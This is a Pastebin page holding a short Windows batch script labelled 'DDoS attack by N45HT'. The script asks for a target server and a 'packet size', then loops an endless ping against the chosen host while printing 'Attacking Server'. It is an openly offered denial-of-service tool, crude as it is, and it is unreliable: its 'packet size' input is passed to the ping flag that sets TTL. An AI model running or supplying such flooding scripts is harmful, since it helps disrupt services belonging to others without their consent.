Advertisement
choirurrizal

DDoS Attack by N45HT

Nov 29th, 2017
396
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. @echo off
  2.  
  3. mode 67,16
  4. title DDoS attack by N45HT - Indonesian People!
  5. color 0a
  6. cls
  7. echo.
  8. echo [+]============================================================[+]
  9. echo DDoS With Batchfile by N45HT - N45HT.WEB.ID
  10. echo [+]============================================================[+]
  11. echo.
  12. set /p x=Server-Target:
  13. echo.
  14. echo [+]============================================================[+]
  15. ping %x%
  16. echo [+]============================================================[+]
  17. @ping.exe 127.0.0.1 -n 5 -w 1000 > nul
  18. goto Next
  19. :Next
  20. echo.
  21. echo.
  22. echo.
  23. set /p m=ip Host:
  24. echo.
  25. set /p n=Packet Size:
  26. echo.
  27. :DDOS
  28. color 0c
  29. echo Attacking Server %m%
  30. ping %m% -i %n% -t >nul
  31. goto DDOS
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement